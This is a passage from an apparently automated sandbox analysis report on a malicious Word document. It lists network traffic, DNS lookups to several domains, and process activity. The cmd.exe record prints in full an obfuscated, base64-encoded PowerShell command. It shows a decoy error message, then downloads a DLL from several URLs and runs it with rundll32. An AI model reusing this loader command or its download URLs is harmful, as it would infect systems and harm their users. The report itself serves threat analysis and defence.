                                                                      Jan 27, 2021 12:17:43.544073105 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544111013 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544132948 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.544164896 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544202089 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544217110 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.544253111 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544267893 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.544317007 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544358015 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544379950 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.544413090 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544450045 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544471979 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.544506073 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544544935 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544564962 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.544599056 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544636965 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544652939 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.544689894 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544727087 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544744015 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.544791937 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544847012 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544859886 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.544905901 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544946909 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.544965029 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.545002937 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.545041084 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.545057058 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.545094967 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.545133114 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.545150042 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.545181036 CET4434917435.163.191.195192.168.2.22
                                                                      Jan 27, 2021 12:17:43.545239925 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.553586006 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:17:43.884793997 CET4916580192.168.2.22191.6.196.95
                                                                      Jan 27, 2021 12:17:43.884843111 CET4916680192.168.2.2275.103.81.81
                                                                      Jan 27, 2021 12:17:43.884850979 CET49174443192.168.2.2235.163.191.195
                                                                      Jan 27, 2021 12:18:49.250555992 CET4917580192.168.2.2284.232.229.24
                                                                      Jan 27, 2021 12:18:49.340081930 CET804917584.232.229.24192.168.2.22
                                                                      Jan 27, 2021 12:18:49.843300104 CET4917580192.168.2.2284.232.229.24
                                                                      Jan 27, 2021 12:18:49.931998968 CET804917584.232.229.24192.168.2.22
                                                                      Jan 27, 2021 12:18:50.436121941 CET4917580192.168.2.2284.232.229.24
                                                                      Jan 27, 2021 12:18:50.523777008 CET804917584.232.229.24192.168.2.22
                                                                      Jan 27, 2021 12:18:57.070441961 CET491768080192.168.2.2251.255.203.164
                                                                      Jan 27, 2021 12:19:00.077877045 CET491768080192.168.2.2251.255.203.164
                                                                      Jan 27, 2021 12:19:06.084498882 CET491768080192.168.2.2251.255.203.164
                                                                      Jan 27, 2021 12:19:18.100132942 CET491778080192.168.2.2251.255.203.164
                                                                      Jan 27, 2021 12:19:21.108556986 CET491778080192.168.2.2251.255.203.164
                                                                      Jan 27, 2021 12:19:27.115104914 CET491778080192.168.2.2251.255.203.164

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 27, 2021 12:17:34.783607006 CET5219753192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:35.270771980 CET53521978.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:35.839396954 CET5309953192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:36.146183968 CET53530998.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:36.524178982 CET5283853192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:36.995876074 CET53528388.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:38.050385952 CET6120053192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:38.098505974 CET53612008.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:38.105164051 CET4954853192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:38.153475046 CET53495488.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:38.695741892 CET5562753192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:38.756236076 CET53556278.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:38.759830952 CET5600953192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:38.816346884 CET53560098.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:39.773932934 CET6186553192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:39.983139992 CET53618658.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:40.848473072 CET5517153192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:41.014501095 CET53551718.8.8.8192.168.2.22
                                                                      Jan 27, 2021 12:17:41.667201042 CET5249653192.168.2.228.8.8.8
                                                                      Jan 27, 2021 12:17:41.727834940 CET53524968.8.8.8192.168.2.22

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Jan 27, 2021 12:17:34.783607006 CET192.168.2.228.8.8.80x82b3Standard query (0)riandutra.comA (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:35.839396954 CET192.168.2.228.8.8.80xe9daStandard query (0)calledtochange.orgA (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:36.524178982 CET192.168.2.228.8.8.80xfc39Standard query (0)mrveggy.comA (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:39.773932934 CET192.168.2.228.8.8.80x21e1Standard query (0)norailya.comA (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:40.848473072 CET192.168.2.228.8.8.80x9f83Standard query (0)hbprivileged.comA (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:41.667201042 CET192.168.2.228.8.8.80x868Standard query (0)ummahstars.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Jan 27, 2021 12:17:35.270771980 CET8.8.8.8192.168.2.220x82b3No error (0)riandutra.com191.6.196.95A (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:36.146183968 CET8.8.8.8192.168.2.220xe9daNo error (0)calledtochange.org75.103.81.81A (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:36.995876074 CET8.8.8.8192.168.2.220xfc39No error (0)mrveggy.com177.12.170.95A (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:39.983139992 CET8.8.8.8192.168.2.220x21e1No error (0)norailya.com104.168.154.203A (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:41.014501095 CET8.8.8.8192.168.2.220x9f83No error (0)hbprivileged.com35.209.96.32A (IP address)IN (0x0001)
                                                                      Jan 27, 2021 12:17:41.727834940 CET8.8.8.8192.168.2.220x868No error (0)ummahstars.com35.163.191.195A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • riandutra.com
                                                                      • calledtochange.org

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.2249165191.6.196.9580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 27, 2021 12:17:35.541695118 CET0OUTGET /email/AfhE8z0/ HTTP/1.1
                                                                      Host: riandutra.com
                                                                      Connection: Keep-Alive
                                                                      Jan 27, 2021 12:17:35.820429087 CET1INHTTP/1.1 403 Forbidden
                                                                      Date: Wed, 27 Jan 2021 11:17:35 GMT
                                                                      Server: Apache
                                                                      Content-Length: 404
                                                                      Keep-Alive: timeout=5, max=500
                                                                      Connection: Keep-Alive
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 65 6d 61 69 6c 2f 41 66 68 45 38 7a 30 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /email/AfhE8z0/on this server.<br />Server unable to read htaccess file, denying access to be safe</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.224916675.103.81.8180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 27, 2021 12:17:36.329037905 CET1OUTGET /CalledtoChange/8huSOd/ HTTP/1.1
                                                                      Host: calledtochange.org
                                                                      Connection: Keep-Alive
                                                                      Jan 27, 2021 12:17:36.515872955 CET2INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 27 Jan 2021 11:17:36 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      HTTPS Packets

                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                      Jan 27, 2021 12:17:37.519368887 CET177.12.170.95443192.168.2.2249167CN=mrveggy.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Jan 11 02:13:40 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sun Apr 11 03:13:40 CEST 2021 Wed Sep 29 21:21:40 CEST 2021769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                      Jan 27, 2021 12:17:42.134701967 CET35.163.191.195443192.168.2.2249174CN=www.ummahstars.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USFri Mar 20 12:52:22 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Thu May 19 22:40:05 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                      Code Manipulations

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: WINWORD.EXE PID: 1108 Parent PID: 584

                                                                      General

                                                                      Start time:12:17:33
                                                                      Start date:27/01/2021
                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                      Imagebase:0x13f890000
                                                                      File size:1424032 bytes
                                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: cmd.exe PID: 2652 Parent PID: 1220

                                                                      General

                                                                      Start time:12:17:35
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhAGgAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AdwB3AHcAJwArACcALgAnACkAKwAnAHQAJwArACcAZQBlACcAKwAoACcAbABlAGsAZAAnACsAJwBlAGQAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBjAGcAJwArACcAaQAtAGIAaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAEwAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAHAAYABsAEEAYwBFACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIAAnACsAJwBhACcAKQArACcAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQAnACsAJwB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAJwArACcAdgB3AGUAJwApACkAKQAsACgAJwBhACcAKwAoACcAZQBmACcAKwAnAGYAJwApACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACkAWwAyAF0AKQAuACIAcwBQAGAAbABpAFQAIgAoACQAVAA5ADIAVgAgACsAIAAkAFgAagBiADYAdQB1ADkAIAArACAAJABVADUAXwBXACkAOwAkAEYAMQA4AEgAPQAoACcAWQAnACsAKAAnADEANwAnACsAJwBYACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIADIAMAA5AG0AMwA0ACAAaQBuACAAJABPAHoAeAA5AHgAawBkACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAFkAUwB0AEUATQAuAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAFQAKQAuACIARABvAHcAYABOAEwATwBBAEQAYABGAEkAYABsAEUAIgAoACQASAAyADAAOQBtADMANAAsACAAJABJAHEANgByAGYAZwAwACkAOwAkAFYAMwAyAEUAPQAoACgAJwBYACcAKwAnADcAMQAnACkAKwAnAEcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAcQA2AHIAZgBnADAAKQAuACIATABlAE4AYABnAHQASAAiACAALQBnAGUAIAAzADQAMgA1ADgAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQASQBxADYAcgBmAGcAMAAsACgAJwBTAGgAJwArACgAJwBvAHcARAAnACsAJwBpACcAKQArACcAYQAnACsAKAAnAGwAbwBnACcAKwAnAEEAJwApACkALgAiAHQAYABPAFMAVABgAFIAaQBOAEcAIgAoACkAOwAkAFAAOAA5AEcAPQAoACcAUwA4ACcAKwAnADEAVAAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMgAwAEcAPQAoACcAQgAnACsAKAAnADEAJwArACcAMgBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBaAD0AKAAnAFEAJwArACgAJwBfADUAJwArACcAQQAnACkAKQA=
                                                                      Imagebase:0x4a950000
                                                                      File size:345088 bytes
                                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: msg.exe PID: 2564 Parent PID: 2652

                                                                      General

                                                                      Start time:12:17:35
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\msg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:msg user /v Word experienced an error trying to open the file.
                                                                      Imagebase:0xff490000
                                                                      File size:26112 bytes
                                                                      MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: powershell.exe PID: 2552 Parent PID: 2652

                                                                      General

                                                                      Start time:12:17:36
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
